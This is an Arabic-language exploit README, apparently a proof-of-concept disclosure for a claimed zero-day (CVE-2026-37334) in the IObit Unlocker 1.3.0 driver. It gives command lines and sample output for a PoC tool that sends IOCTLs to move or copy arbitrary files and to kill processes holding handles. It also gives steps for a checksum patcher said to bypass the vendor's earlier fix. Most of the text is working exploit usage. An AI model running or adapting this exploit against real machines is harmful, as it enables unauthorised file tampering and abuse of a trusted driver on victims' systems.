
(0 day) CVE-2026-37334 ينقل أو ينسخ أي ملف. يتجاوز التصحيح السابق عبر خدعة المجموع الاختباري. IObit Unlocker الإصدار 1.3.0
(0 يوم) نقل أو نسخ أي ملف. يتجاوز التصحيح السابق باستخدام خدعة المجموع الاختباري.
الشرح: https://nathan2.com/files/iobit.pdf معلومات عامة: https://nathan2.com/posts/iobit/
اكتشفت هذا دون أن أعلم بوجود استغلال سابق اكتشف هذا أولاً. ومع ذلك، فإن هذا يتجاوز التصحيح الذي أجرته IObit. يعمل في الإصدار 1.3.0
الاستخدام:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- إرسال الطلب ---
المصدر: C:\copied.txt
الوجهة: C:\t.txt
النوع الفرعي: 4 | العلامات: 1
نجح IOCTL. أرجعت وحدة التحكم 4 بايت.
التحقق: الملف الهدف موجود/يمكن الوصول إليه.
المزيد من العلامات:
الاستخدام: UnlockerCLI.exe <مسار المصدر> <مسار الوجهة> <النوع الفرعي> <العلامات>
مثال: UnlockerCLI.exe "C:\Path With Space\file.txt" "C:\backup\file.txt" 3 (نوع فرعي) 5 (علامة عملية)
الأنواع الفرعية: (على الأقل تلك التي أستخدمها) 3=نقل، 4=نسخ
علامات العملية: 0=عدم إزالة المقبض، 1 = إزالة المقابض، 2 = إنهاء العمليات التي تحتوي على مقابض، 4 = إنهاء العمليات وإزالة المقابض، 5??? تجريبي.
يجب أن يكون الملف التنفيذي المرفق فعالاً ومصححاً بالفعل. إذا لم يكن كذلك، اقرأ أدناه.
استخدم مصحح المجموع الاختباري لتصحيح الـ PoC. على النحو التالي:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
حجم الملف الأصلي: 235449 بايت
المجموع البديل الحالي: 11044471
مجموع XOR الحالي: 43
الملف يحتوي بالفعل على المجاميع الاختبارية الصحيحة. لا حاجة لتغييرات.
سيسمح هذا للملف التنفيذي بالتواصل مع برنامج تشغيل IObitUnlocker.